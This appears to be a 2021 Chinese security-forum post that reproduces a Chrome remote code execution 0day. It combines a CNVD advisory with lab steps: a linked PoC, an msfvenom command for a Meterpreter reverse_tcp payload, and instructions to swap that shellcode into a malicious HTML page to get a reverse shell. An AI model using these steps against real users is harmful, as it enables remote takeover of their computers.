安全矩阵

 找回密码
 立即注册
搜索
查看: 2419|回复: 0

Chrome远程代码执行并移植MSF控制

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-17 08:32:39 | 显示全部楼层 |阅读模式
原文链接;Chrome远程代码执行并移植MSF控制

     国家信息安全漏洞共享平台(CNVD)收录了 Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。CNVD 对该漏洞的综合评级为 “高危”。



Google Chrome 0day 远程代码执行漏洞复现
        条件:

                1.环境win10、win7均可,sever不行

                2.关闭沙箱模式-no-sandbox

                3.chrome客户端需64位(Google Chrome < = 89.0.4389.114)



实验:

使用命令关闭沙箱模式-no-sandbox



Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day





将shellcode换成msf:

        这里有集成的脚本:https://github.com/badboycxcc/script

1.生成shellcode:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx  lport=4444 -f csharp -o payload3.txt



将生成的shellcode进行替换即可   



使用谷歌打开恶意html文件即可反弹shell




据说沙盒可以控制

漏洞处置建议

         目前,Google 公司尚未发布新版本或补丁包修复漏洞,CNVD 建议用户使用 Google Chrome 浏览器时不关闭默认沙盒模式,同时谨慎访问来源不明的网页链接或文件。



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 00:35 , Processed in 0.011848 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表